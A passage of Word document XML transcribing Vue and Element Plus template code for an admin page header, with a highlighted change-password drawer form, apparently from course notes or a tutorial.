        <w:t xml:space="preserve">            &lt;Fold /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2723B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7510A1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0BF077" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-tooltip effect="dark" content="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" placement="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114E85D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A22F740" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="icon-btn" @click="handleRefresh"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A742651" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;Refresh /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEE9FD" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C934C5A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E4F070" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8C70F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="ml-auto flex items-center " style="margin-left: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43298A80" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB33AAD" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-tooltip effect="dark" content="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换全屏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" placement="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DEC116" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon class="icon-btn" @click="toggle"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA23259" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;FullScreen v-if="!isFullscreen" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72725380" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;Aim v-else /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA472B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A890539" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A5C49" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-dropdown class="dropdown" @command="handleCommand"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD32AAC" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1918CD45" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;span class="flex items-center text-light-50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787A02A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-button class=" bg-transparent text-light-200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59184BC4" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-avatar class="mr-2" :size="25" :src="$store.state.user.avatar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F763F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160812C6" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-icon class="el-icon--right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC4FF22" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            &lt;arrow-down /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CA6F2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D8BD3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3389E582" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C368D7C" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;template #dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE9F0B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E885065" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item command="rePassword"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E812601" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item command="logout"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9BE32F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66674E6D" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243888F6" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB0548" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3672AB" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA1052" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB0D98E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-drawer v-model="showDrawer" title="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" size="45%" :close-on-click-modal="false"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496E62A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C08C155" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-form ref="formRef" :model="form" :rules="rules" label-width="80px" size="small"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDBF2F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-form-item prop="oldpassword" label="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>旧密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC37BA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-input v-model="form.oldpassword" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入旧密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A82C99E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D6D37" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3C760" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            &lt;User /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B947308" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DECD9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66440CE2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF21F3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B65E09" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37427BA7" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-form-item prop="password" label="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>新密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E7D3A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-input v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" type="password" show-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5166DF74" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297469F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D27AA" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            &lt;Lock /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C677FCC" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E832F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111B8642" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA3FD5" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FAE84" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0586B328" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-form-item prop="repassword" label="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43B70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
